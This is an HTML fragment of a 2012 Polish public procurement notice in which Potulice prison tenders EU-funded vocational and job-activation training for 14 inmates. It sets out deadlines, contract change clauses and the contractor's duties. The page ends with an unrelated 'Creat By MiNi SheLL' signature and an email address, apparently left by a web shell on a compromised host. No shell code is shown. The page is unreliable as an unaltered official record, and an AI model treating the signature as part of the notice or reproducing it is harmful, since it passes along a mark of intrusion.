<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Strony ustalają, że treść umowy może ulec zmianie zgodnie z art. 144 ustawy Prawo zamówień publicznych (Dz. U. z 2010r. Nr 113, poz. 759, Nr 161, poz. 1078, Dz. U. z 2011r. Nr 5, poz. 13, Nr 28, poz. 143, Nr 87, poz. 484).
2.	Zmiany postanowień niniejszej umowy mogą dotyczyć w szczególności:
1)	nazwy, adresu oraz osób reprezentujących strony, a także osób wymienionych w § 5 pkt 1  lub w § 5 pkt 2;
2)	urzędowej stawki podatku VAT na świadczenie niniejszej usługi szkolenia;
3)	każdej zmiany, która jest korzystna lub neutralna dla zamawiającego, lub zmiany której nie można było przewidzieć na etapie prowadzonego postępowania o udzielenie zamówienia publicznego;
4)	terminów, o których mowa w § 2 pkt 1 lub w § 2 pkt 2.
3.	Zmiany postanowień niniejszej umowy wymagają potwierdzenia pisemnego w postaci aneksu.
4.	Strona wnioskująca o zmianę postanowień niniejszej umowy niezwłocznie i pisemnie powiadamia o tym fakcie drugą stronę, uzasadniając zmianę okolicznościami faktycznymi i prawnymi oraz przedkłada propozycję aneksu do umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny, Aleja Parkowa 1, 89-120 Potulice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.09.2012 godzina 12:00, miejsce: w siedzibie zamawiającego, 
w sekretariacie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu           
w roku 2012 szkolenia zawodowego dla skazanych w ramach projektu Cykl szkoleniowo - aktywizacyjny służący podniesieniu kwalifikacji zawodowych osób pozbawionych wolności oraz przygotowaniu ich do powrotu na rynek pracy po zakończeniu odbywania kary pozbawienia wolności w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską           
 w ramach Europejskiego Funduszu Społecznego.
)   Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu              
w roku 2012r. Szkolenia aktywizacyjnego dla skazanych w związku z realizacją projektu Cykl szkoleniowo - aktywizacyjny służący podniesieniu kwalifikacji zawodowych osób pozbawionych wolności oraz przygotowaniu ich do powrotu na rynek pracy po zakończeniu odbywania kary pozbawienia wolności                 
w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Grupa 1 Malarz - szpachlarz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu           
w roku 2012 szkolenia zawodowego dla skazanych w ramach projektu Cykl szkoleniowo - aktywizacyjny służący podniesieniu kwalifikacji zawodowych osób pozbawionych wolności oraz przygotowaniu ich do powrotu na rynek pracy po zakończeniu odbywania kary pozbawienia wolności w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską           
 w ramach Europejskiego Funduszu Społecznego
2. Usługa szkolenia zawodowego osadzonych zostanie realizowana         
w Zakładzie Karnym w Potulicach, jako kurs przyuczający do zawodu malarz-szpachlarz, zgodnie z wymaganiami określonymi w niniejszej siwz. CPV: 80530000-8.
3. Ilość kursów: 1.
4.  Ilość osób do przeszkolenia: 14 osób.
5.	Usługa szkolenia zawodowego zostanie przeprowadzona do końca listopada 2012r. w terminie określonym przez Zamawiającego.
6.	Celem szkolenia jest przygotowanie do pracy na stanowisku malarz-szpachlarz oraz zdobycie przez jego uczestników odpowiednich uprawnień zawodowych w tym zakresie.
7.	Zajęcia teoretyczne i praktyczne szkolenia odbywać się będą w siedzibie Zamawiającego, w dni robocze, od poniedziałku do piątku, w wymiarze nie większym niż 8 godzin dziennie.
8.	Szkolenie trwa 100 godzin lekcyjnych (1 godz. = 45 min.), w tym zajęć teoretycznych: 20 godzin.
9.	Zagadnienia dotyczące szkolenia: BHP; materiałoznawstwo; rysunek zawodowy; technologia z elementami maszynoznawstwa; zajęcia praktyczne (nabycie umiejętności malarsko - szpachlarskich).
10.	Przed rozpoczęciem kursu wykonawca zapewnia wszystkim uczestnikom szkolenia (wraz z osobami rezerwowymi) wszelkie badania lekarskie uprawniające kursantów do uczestnictwa w kursie, spełniające wymagania badań zawodowych na stanowisko malarza - szpachlarza, przeprowadzenie badań lekarskich odbędzie się  w siedzibie Zamawiającego.
11.	Przed rozpoczęciem szkolenia, wykonawca zapoznaje uczestników            
z szczegółowym programem szkolenia oraz przedstawia im harmonogram realizowanych zajęć.
12.	Wykonawca ubezpiecza uczestników szkolenia od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem.
13.	Wykonawca zapewnia uczestnikom szkolenia wszelkie materiały i sprzęt niezbędny do przeprowadzenia niniejszego szkolenia, w tym artykuły biurowe oraz odzież i obuwie ochronne dla każdego uczestnika (wartość materiałów użytych w procesie szkolenia nie może przekroczyć 40% wartości szkolenia).
14.	Wykonawca zapewnia kadrę dydaktyczną o odpowiednich kwalifikacjach do prowadzenia niniejszego szkolenia zawodowego.
15.	Wykonawca przed rozpoczęciem realizacji szkolenia przedstawia program szkolenia zawodowego, sporządzony zgodnie z Rozporządzeniem Ministra Sprawiedliwości w sprawie szczegółowych zasad i trybu prowadzenia nauczania w zakładach karnych z dnia 13 lutego 2004r. (Dz. U. Nr 37, poz. 337) oraz Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 2 marca 2007r. w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia na rynku pracy (Dz. U. Nr 47, poz. 315) zawierający                w szczególności: nazwę i zakres szkolenia; czas trwania i sposób organizacji szkolenia; wymagania wstępne dla uczestników szkolenia; cele szkolenia; plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar,                        z uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej; treści szkolenia w zakresie poszczególnych zajęć edukacyjnych; wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych; sposób sprawdzania efektów szkolenia; dobranie poziomu wiedzy i doświadczenia wykładowców do tematyki szkolenia; przeprowadzenie kursu zgodnie z ustaloną liczbą godzin, bez względu na ewentualne przerwy (choroby wykładowców, święta, dni wolne, awarie itp.); prowadzenie dokumentacji przebiegu szkolenia tj. m.in.: dziennika zajęć edukacyjnych zawierającego listę obecności, wymiar godzin i tematy zajęć edukacyjnych; programu nauczania, protokołu z egzaminu (jeżeli został przeprowadzony); rejestru wydawanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji; ankiet oceny szkolenia i wykładowcy dla uczestników i absolwentów szkolenia, dodatkową listę obecności podpisywaną przez poszczególnych uczestników kursu.  
16.	Wykonawca przeprowadza wśród uczestników szkolenia ocenę merytorycznego i technicznego przebiegu szkolenia m.in. na podstawie formularza ankiety oceniającej. 
17.	W przypadku zajęć praktycznych, wykonawca przed rozpoczęciem realizacji szkolenia wyszczególnia na piśmie sprzęt, urządzenia i ich ilości, jakie będą wykorzystywane podczas zajęć.
18.	Wykonawca odpowiada za przeszkolenie kursantów w zakresie BHP oraz za przestrzeganie warunków BHP w trakcie całego szkolenia.
19.	Szkolenie kończy się egzaminem i wydaniem zaświadczenia potwierdzającego zakres przeszkolenia oraz wydaniem odpowiedniego świadectwa kwalifikacji zawodowych. 
20.	Szkolenie kończy się oceną nabytych umiejętności i wydaniem zaświadczeń o jego ukończeniu, zgodnie z rozporządzeniem MEN oraz MPiPS z dnia 12.10.1993r. w sprawie zasad i warunków podnoszenia kwalifikacji zawodowych 
i wykształcenia ogólnego dorosłych (Dz. U. Nr 103, poz. 472 z późn. zmianami) oraz rozporządzeniem MEN z dnia 11.01 2012r. (Dz. U. Nr 34 poz. 186 
z 2012r) w sprawie uzyskania i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych oraz certyfikatu 
w zakresie zdobytych uprawnień. Oryginały   w/w dokumentów i ich kserokopie mają być potwierdzone za zgodność z oryginałem i przekazane do Zakładu Karnego 
w Potulicach.
21.	Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia oraz              
za należytą staranność przy realizacji zobowiązań umowy.
22.	Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania zamówienia.
23.	Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem Wykonawcy.
24.	Wykonawca określa numery telefonów kontaktowych i faksu oraz innych danych niezbędnych dla sprawnego i terminowego wykonania zamówienia.
25.	Należność za usługę szkolenia zawodowego zostanie uregulowana przelewem, w terminie 30 dni, od daty otrzymania faktury przez zamawiającego 
za przeprowadzenie kursu.
26.	Niniejsza część postępowania dotycząca grupy 1 może zostać unieważniona na podstawie art. 93 ust. 1a ustawy Pzp.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Grupa 2 Szkolenie aktywizacyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)   Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu              
w roku 2012r. Szkolenia aktywizacyjnego dla skazanych w związku z realizacją projektu Cykl szkoleniowo - aktywizacyjny służący podniesieniu kwalifikacji zawodowych osób pozbawionych wolności oraz przygotowaniu ich do powrotu na rynek pracy po zakończeniu odbywania kary pozbawienia wolności               
w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
	2)	Usługa szkolenia aktywizacyjnego osadzonych zostanie realizowana              w Zakładzie Karnym w Potulicach, zgodnie z wymaganiami określonymi               
w niniejszej siwz. CPV: 80500000-9.
	3)	ilość kursów: 1
4)         ilość osób do przeszkolenia: 14 osób 
5)	         Usługi szkolenia aktywizacyjnego zostaną przeprowadzone do końca listopada 2012r. w terminach określonych przez Zamawiającego.
6)   Celem szkolenia jest nabycie przez beneficjentów podstawowych zagadnień związanych ze skutecznym radzeniem sobie na rynku pracy - zagadnienia: autoprezentacja; komunikacja z pracodawcą; rozmowa kwalifikacyjna; dokumenty aplikacyjne; sposoby poszukiwania pracy; poznawanie i odkrywanie swoich umiejętności i predyspozycji zawodowych.
7)	         Szkolenia odbywać się będą w siedzibie Zamawiającego, w dni robocze, 
od poniedziałku do piątku, w wymiarze nie większym niż 8 godzin dziennie.
8)         Szkolenie trwa 20 godzin lekcyjnych (1 godz. = 45 min.)
9)        Wykonawca zapewnia kadrę dydaktyczną o kwalifikacjach odpowiednich 
do prowadzenia zajęć psychokorekcyjnych oraz doradztwa zawodowego.
10)   Przed rozpoczęciem szkolenia, wykonawca informuje beneficjentów ostatecznych o tym, że szkolenie jest współfinansowane z przez Unię Europejską - Europejski Fundusz Społeczny w ramach Programu Operacyjnego Kapitał Ludzki, oraz zapoznaje uczestników z szczegółowym programem szkolenia oraz przedstawia im harmonogram realizowanych zajęć.
11)  Wykonawca ubezpiecza uczestników szkolenia od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem.
12)      Wykonawca zapewnia uczestnikom szkolenia wszelkie materiały i sprzęt niezbędny do przeprowadzenia szkolenia aktywizacyjnego, a Zamawiający        
 we własnym zakresie dostarczy sprzęt multimedialny.
13)     Wykonawca przed rozpoczęciem realizacji szkolenia przedstawia program szkolenia, sporządzony zgodnie z Rozporządzeniem Ministra Sprawiedliwości 
w sprawie szczegółowych zasad i trybu prowadzenia nauczania w zakładach karnych z dnia 13 lutego 2004r. (Dz. U. Nr 37, poz. 337) oraz Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 2 marca 2007r. w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia na rynku pracy (Dz. U. Nr 47, poz. 315) zawierający w szczególności: nazwę i zakres szkolenia; czas trwania i sposób organizacji szkolenia; wymagania wstępne dla uczestników szkolenia; cele szkolenia; plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar,    z uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej; treści szkolenia w zakresie poszczególnych zajęć edukacyjnych; wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych; sposób sprawdzania efektów szkolenia; dobranie poziomu wiedzy i doświadczenia wykładowców do tematyki szkolenia; przeprowadzenie kursu zgodnie z ustaloną liczbą godzin, bez względu na ewentualne przerwy (choroby wykładowców, święta, dni wolne, awarie itp.); prowadzenie dokumentacji przebiegu szkolenia tj. m.in.: dziennika zajęć edukacyjnych, programu nauczania, wymiar godzin i tematy zajęć edukacyjnych, protokołu z egzaminu (jeżeli został przeprowadzony), rejestru wydawanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji, ankiet oceny szkolenia i wykładowcy dla uczestników i absolwentów szkolenia, listę obecności podpisywaną przez poszczególnych beneficjentów ostatecznych i wykładowcy. Lista obecności powinna być podpisana kolorem niebieskim   lub zielonym.
14)   Wykonawca przeprowadza wśród uczestników szkolenia ocenę merytorycznego i technicznego przebiegu szkolenia m.in. na podstawie formularza ankiety oceniającej. 
15)     W przypadku zajęć praktycznych, wykonawca przed rozpoczęciem realizacji szkolenia wyszczególnia na piśmie sprzęt i urządzenia oraz ich ilości, jakie będą wykorzystywane podczas zajęć.
16)       Wykonawca odpowiada za przestrzeganie warunków i przepisów BHP 
w trakcie całego szkolenia.
17)   Szkolenie kończy się oceną nabytych umiejętności i wydaniem zaświadczeń 
o jego ukończeniu, zgodnie z rozporządzeniem MEN oraz MPiPS z dnia 12.10.1993r. w sprawie zasad i warunków podnoszenia kwalifikacji zawodowych 
i wykształcenia ogólnego dorosłych (Dz. U. Nr 103, poz. 472 z późn. zmianami) oraz rozporządzeniem MEN z dnia 11.01 2012r. (Dz. U. Nr 34, poz. 186 z 2012r) 
w sprawie uzyskania i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych oraz certyfikatu 
w zakresie zdobytych uprawnień. Oryginały   w/w dokumentów i ich kserokopie potwierdzone za zgodność z oryginałem mają być przekazane do Zakładu Karnego w Potulicach.
18)    Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia oraz za należytą staranność przy realizacji zobowiązań umowy.
19)      Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania zamówienia.
20)     Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem Wykonawcy.
21)       Wykonawca określa numery telefonów kontaktowych i faksu oraz innych danych niezbędnych dla sprawnego i terminowego wykonania zamówienia.
22)   Należność za usługi szkolenia aktywizacyjnego zostanie uregulowana przelewem, w terminie 30 dni, od daty otrzymania faktury przez zamawiającego 
za przeprowadzenie kursu.
23)  Niniejsza część postępowania dotycząca grupy 2 może zostać unieważniona na podstawie art. 93 ust. 1a ustawy Pzp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com